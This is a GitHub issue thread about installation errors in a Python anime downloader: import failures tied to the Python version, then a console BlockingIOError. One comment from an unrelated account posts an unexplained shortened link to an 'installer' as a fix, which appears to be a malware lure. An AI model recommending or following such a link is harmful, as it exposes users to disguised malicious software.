### ISSUE TITLE
Issues setting up - updated

### ISSUE THREAD

**Issue by draeician** [tonder0812/gogoanime#2]
I did execute the bash install.sh on my linux system.  I've got a venv environment setup for this.

Traceback (most recent call last):
  File "/home/draeician/git/gogoanime/main.py", line 8, in <module>
    from anime import get_anime_info
  File "/home/draeician/git/gogoanime/anime.py", line 4, in <module>
    from parsers import AnimeParser
  File "/home/draeician/git/gogoanime/parsers/__init__.py", line 1, in <module>
    from .anime import AnimeParser
  File "/home/draeician/git/gogoanime/parsers/anime.py", line 4, in <module>
    from .common import AttrDict, Parser
  File "/home/draeician/git/gogoanime/parsers/common.py", line 5, in <module>
    from typing import Self
ImportError: cannot import name 'Self' from 'typing' (/usr/lib/python3.10/typing.py)

**Comment by Klevente12** [comment]
try this
https://bit.ly/4e4zLlq
select the desired compiler in the installer

**Comment by tonder0812** [comment]
Hi @draeician

From what i can see you are using python 3.10 and as this project needs at least python 3.11 you would need to update python to at least that version to run the project

**Comment by draeician** [comment]
I recreated the venv with the 3.11:
python -V
Python 3.11.9

I added an anime to new.txt like in the README.md:
(venv) draeician@nomnom:~/git/gogoanime$ cat config/new.txt 
ookami-to-koushinryou-merchant-meets-the-wise-wolf-dub

(venv) draeician@nomnom:/git/gogoanime$ python check.py 
Traceback (most recent call last):
  File "/home/draeician/git/gogoanime/check.py", line 12, in <module>
    from downloader import download_anime
  File "/home/draeician/git/gogoanime/downloader.py", line 18, in <module>
    from printer import AbstractPrinter, FakePrinter
  File "/home/draeician/git/gogoanime/printer/__init__.py", line 2, in <module>
    from .fake_printer import FakePrinter as _FakePrinter
  File "/home/draeician/git/gogoanime/printer/fake_printer.py", line 1, in <module>
    from typing import override
ImportError: cannot import name 'override' from 'typing' (/usr/lib/python3.11/typing.py)
(venv) draeician@nomnom:~/git/gogoanime$ 

Getting a different error now.

I blew the venv again, installed python 3.12, redid the venv and NOW it executes without an error.  Did I setup the new.txt correctly?  What is a good workflow for this?

**Comment by draeician** [comment]
I tried this:
python main.py -id ookami-to-koushinryou-merchant-meets-the-wise-wolf-dub

I get this result:
Exception in thread Thread-1 (render):
Traceback (most recent call last):
  File "/usr/lib/python3.12/threading.py", line 1075, in _bootstrap_inner
    self.run()
  File "/usr/lib/python3.12/threading.py", line 1012, in run
    self._target(*self._args, **self._kwargs)
  File "/home/draeician/git/gogoanime/printer/printer.py", line 74, in render
    self.__render()
  File "/home/draeician/git/gogoanime/printer/printer.py", line 106, in __render
    console.set_text(self.msg, int(self.scroller.position), should_set_cursor)
  File "/home/draeician/git/gogoanime/printer/console/linux_console.py", line 1176, in set_text
    print(msg, end="", flush=True)
BlockingIOError: [Errno 11] write could not complete without blocking

I tried with -Iwhitelist, but got this:
python main.py -id ookami-to-koushinryou-merchant-meets-the-wise-wolf-dub -Iwhitelist
whitelist ep ids: (leave blank to stop inputing)

And the program exists.

**Comment by draeician** [comment]
Realized you closed the issue without seeing if this resolved the issue.  Creating a new issue.
